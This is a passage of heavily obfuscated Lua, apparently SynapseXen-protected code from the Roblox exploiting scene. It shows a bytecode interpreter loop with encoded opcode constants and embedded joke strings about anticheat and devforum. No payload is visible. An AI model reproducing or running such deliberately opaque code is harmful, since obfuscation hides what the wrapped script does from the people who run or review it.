SynapseXen_lIIIllIiiIIlil,SynapseXen_llllIilliIllilII=1,-1;local SynapseXen_lIiliiIiIIiIil,SynapseXen_IllIlIIiiliiiliiiIIi={},SynapseXen_iiiIiIlliII('#',...)-1;local SynapseXen_iIIlIiiIiiiIIIi=0;local SynapseXen_IlIlliI={}local SynapseXen_lIiIlIliillllIi={}local SynapseXen_lIiil=setmetatable({},{__index=SynapseXen_IlIlliI,__newindex=function(SynapseXen_IllliIiIIiiilIIlIIII,SynapseXen_lIIIlIIillliiI,SynapseXen_IllIilil)if SynapseXen_lIIIlIIillliiI>SynapseXen_llllIilliIllilII then SynapseXen_llllIilliIllilII=SynapseXen_lIIIlIIillliiI end;SynapseXen_IlIlliI[SynapseXen_lIIIlIIillliiI]=SynapseXen_IllIilil end})local function SynapseXen_iIllIIiIillIli()local SynapseXen_illIIilIiIIiIIill,SynapseXen_lliIiIliI;while true do SynapseXen_illIIilIiIIiIIill=SynapseXen_lilllillilllIilIIlII[SynapseXen_lIIIllIiiIIlil]SynapseXen_lliIiIliI=SynapseXen_illIIilIiIIiIIill[2075702005]SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1;if SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2237059324]or(function()local SynapseXen_IiIil="what are you trying to say? that fucking one dot + dot + dot + many dots is not adding adding 1 dot + dot and then adding all the dots together????"SynapseXen_ilIliiI[2237059324]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(689120648,1894940911),SynapseXen_IiilillliiIi(2568226093,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-#{2115700443}return SynapseXen_ilIliiI[2237059324]end)())then local SynapseXen_IiIiilIIliIIlliI,SynapseXen_llIlillliIl=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[3170008901]or(function(...)local SynapseXen_IiIil="thats how mafia works"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2173487584,979731546)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(917484272,3377508377)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3170008901]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3944331246,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2416379660,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-#{1158708637,3706367876,213133350,587657866,1394594993,401123642,1691909446,3774809651,2054362753,2279351627}return SynapseXen_ilIliiI[3170008901]end)(1231,11053,{})),SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[3115045441]or(function(...)local SynapseXen_IiIil="this is so sad, alexa play ripull.mp4"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(715340527,2380450302)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(524462746,3770513842)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3115045441]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(154598340,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3320293398,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{2372983513,1183266862,2575093247,3410736441,3590593174,1729231221,180773794,2099671796,1585577400,3158733547}return SynapseXen_ilIliiI[3115045441]end)("I",2937),512)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1706423649]or(function()local SynapseXen_IiIil="hi devforum"SynapseXen_ilIliiI[1706423649]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3937627519,2603036986),SynapseXen_IiilillliiIi(1139670956,SynapseXen_IllIiIili[1]))-string.len(SynapseXen_IiIil)-#{3164114190,2749810695,92834522,3716905054,4286087011,1771126990,1564038248}return SynapseXen_ilIliiI[1706423649]end)())][SynapseXen_IiIiilIIliIIlliI]=SynapseXen_llIlillliIl elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1350440653]or(function(...)local SynapseXen_IiIil="aspect network better obfuscator"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(4280985209,650578632)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1711149431,2583820280)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1350440653]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3559747761,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1131200172,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{42645274,2503431295}return SynapseXen_ilIliiI[1350440653]end)(7011,"lilIiiiI","iiIilii",{},{},"lIIiliiilIIIl",5124))then local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[1173778920]or(function()local SynapseXen_IiIil="inb4 posted on exploit reports section"SynapseXen_ilIliiI[1173778920]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3284746826,2057650963),SynapseXen_IiilillliiIi(4156750296,SynapseXen_IiIilliilIIl))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{4209506215}return SynapseXen_ilIliiI[1173778920]end)(),512)local SynapseXen_llIlillliIl=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[706044938]or(function()local SynapseXen_IiIil="SECURE API, IMPOSSIBLE TO BYPASS!"SynapseXen_ilIliiI[706044938]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2837326691,3869576744),SynapseXen_IiilillliiIi(2109759402,SynapseXen_IllIiIili[1]))-string.len(SynapseXen_IiIil)-#{4163246970,1113348721,3219566586,393120346}return SynapseXen_ilIliiI[706044938]end)(),512)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[3941485244]or(function()local SynapseXen_IiIil="double-header fair! this rationalization has a overenthusiastically anticheat! you will get nonpermissible for exploiting!"SynapseXen_ilIliiI[3941485244]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1902707638,3629916122),SynapseXen_IiilillliiIi(2605467173,SynapseXen_IllIiIili[1]))-string.len(SynapseXen_IiIil)-#{1214588667,3136978118,692158314,4151072178,977135190,3750361546,596744374,4251872909,369275992}return SynapseXen_ilIliiI[3941485244]end)())]=SynapseXen_IiIiilIIliIIlliI/SynapseXen_llIlillliIl elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1651289912]or(function()local SynapseXen_IiIil="xen best rerubi paste"SynapseXen_ilIliiI[1651289912]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3559831008,79599079),SynapseXen_IiilillliiIi(2654855873,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3131123318,689369725,415809644,3344199838,1377412525}return SynapseXen_ilIliiI[1651289912]end)())then SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[4165488546]or(function(...)local SynapseXen_IiIil="sometimes it be like that"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3848686573,2729341668)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1455454090,2839502347)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[4165488546]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2137784231,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(4166416432,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{822315204,1824313775,2568657826,3868013286,3581439433,2670323724}return SynapseXen_ilIliiI[4165488546]end)({},6441))]=not SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[2407227799]or(function(...)local SynapseXen_IiIil="xen detects custom getfenv"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1693665372,3569202504)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(345999097,3948964147)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2407227799]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1056613674,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1161164457,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{1315998025,2313707644}return SynapseXen_ilIliiI[2407227799]end)(11820,"III",1012,"IiiIiiIIiiIlIIIiIil","IIiIillIIiiII","illIlIIiIlIIillli",1510,10715),512),SynapseXen_iIIlIiiIiiiIIIi)]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[3435828327]or(function(...)local SynapseXen_IiIil="now with shitty xor string obfuscation"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(650874477,2002969591)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2044443333,2250489865)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3435828327]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(281276930,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(264721401,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1050051155,2917636328,1484511634,2427988989,2625832876}return SynapseXen_ilIliiI[3435828327]end)({},14700,11205,"iIIllliIil",1656,"IIiIiIiIIliiilli",10562,306))then SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[4080326789]or(function(...)local SynapseXen_IiIil="can we have an f in chat for ripull"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1538702067,2257088128)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1708059061,2586940403)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[4080326789]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1628266068,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3617660070,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-#{2012208184,2302520333,1167333205,2692622145,520468326,1210355783,2608559832,497975893,2952758983}return SynapseXen_ilIliiI[4080326789]end)(8408))]={}elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2846921207]or(function(...)local SynapseXen_IiIil="my way to go against expwoiting is to have safety measuwes. i 1 wocawscwipt and onwy moduwes. hewe's how it wowks: this scwipt bewow stowes the moduwes in a tabwe fow each moduwe we send the wist with the moduwes and moduwe infowmation and use inyit a function in my moduwe that wiww stowe the info and aftew it has send to aww the moduwes it wiww dewete them. so whenyevew the cwient twies to hack they cant get the moduwes. onwy this peace of wocawscwipt."local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2919502725,2212994079)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1106185208,3188784240)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2846921207]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(494536292,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2117336998,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2203197827,3444921354,3311791272}return SynapseXen_ilIliiI[2846921207]end)(792,{},{},"ii",{},{}))then SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[3721827834]or(function()local SynapseXen_IiIil="https://twitter.com/Ripull_RBLX/status/1059334518581145603"SynapseXen_ilIliiI[3721827834]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(18917392,3242122499),SynapseXen_IiilillliiIi(195197787,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-#{2256087892,3506819182,3980244327,2962768283,2773627450,438080310,48709041,488076123,3578461152}return SynapseXen_ilIliiI[3721827834]end)(),256),SynapseXen_iIIlIiiIiiiIIIi)]=SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[1433741196]or(function(...)local SynapseXen_IiIil="hi my 2.5mb script doesn't work with xen please help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(910094605,270771872)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(4217612763,77373171)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1433741196]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3045745990,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3711652449,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{4078911314,3967836592,3168050681}return SynapseXen_ilIliiI[1433741196]end)({}),512)~=0;if SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[4087240006]or(function(...)local SynapseXen_IiIil="pain exist is gonna connect the dots of xen"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(687751856,2178731452)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1411011856,2883925452)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[4087240006]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1483716376,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(986526131,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-#{2282971191,331397578,1449769597,400663913,3145137010}return SynapseXen_ilIliiI[4087240006]end)({},{},7997,"ilIIiiIiIIi","lIIllIIlIlli",3210,"iliIliilliiIli",5387))~=0 then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1 end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2631474025]or(function(...)local SynapseXen_IiIil="xen best rerubi paste"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2619714012,331464307)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3717260571,577696518)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2631474025]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1770625461,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(769871141,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-#{3024368584}return SynapseXen_ilIliiI[2631474025]end)(8601,"IIlIliIlIiIll",{},13450,{}))then SynapseXen_lIiil[SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2879206373]or(function(...)local SynapseXen_IiIil="thats how mafia works"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(98563758,2484327930)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2651399016,1643599785)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2879206373]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2189352871,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(416530393,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{2050813996,1617382568,2587344509,2856225852,3485663209}return SynapseXen_ilIliiI[2879206373]end)({},"iIllllllIIIiilIIIii","IilillIiii","iiIiiIllilliiIiIII",13028,6419,{},"liiIllIl",8936,"Iilii"),256)]=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[2116109763],SynapseXen_ilIliiI[3753678344]or(function()local SynapseXen_IiIil="epic gamer vision"SynapseXen_ilIliiI[3753678344]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(4119231213,3565575909),SynapseXen_IiilillliiIi(1873677490,SynapseXen_IiIilliilIIl))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{2479759445,1090288907,3960333150,3117984197,1431705654,1010956430}return SynapseXen_ilIliiI[3753678344]end)(),262144)]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1914696449]or(function(...)local SynapseXen_IiIil="skisploit is the superior obfuscator, clearly."local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3774024766,2644373349)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2752365131,1542568473)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1914696449]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(201873211,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1070169549,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2020212221,3471284216,1840209851,453429031,2622055414,115572401,1720639688,1324718988,574728788}return SynapseXen_ilIliiI[1914696449]end)(13434,4437,"IlIIi"))then local SynapseXen_liIilIlIllIill=SynapseXen_iiIii(SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2830735147]or(function(...)local SynapseXen_IiIil="wally bad bird"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(752920657,4211458750)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1183270831,3111723259)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2830735147]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2711940045,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1768875552,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{3729789756,1715957769,331847418,2329479155,947176838,2938409216,3517286981}return SynapseXen_ilIliiI[2830735147]end)({},"iiiIIl",855,12557,140,5399)),SynapseXen_iIIlIiiIiiiIIIi,256)local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[3115411478]or(function(...)local SynapseXen_IiIil="wait for someone on devforum to say they are gonna deobfuscate this"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(458972678,2310140010)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1979076591,2315861697)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3115411478]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2376303227,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1373986505,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{706675280,366896630,69308444,2582863214}return SynapseXen_ilIliiI[3115411478]end)({},2725,"IiiiiilI","IiillIiI",10301,{}))local SynapseXen_llIlillliIl=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[555456121]or(function(...)local SynapseXen_IiIil="this is a christian obfuscator, no cursing allowed in our scripts"local 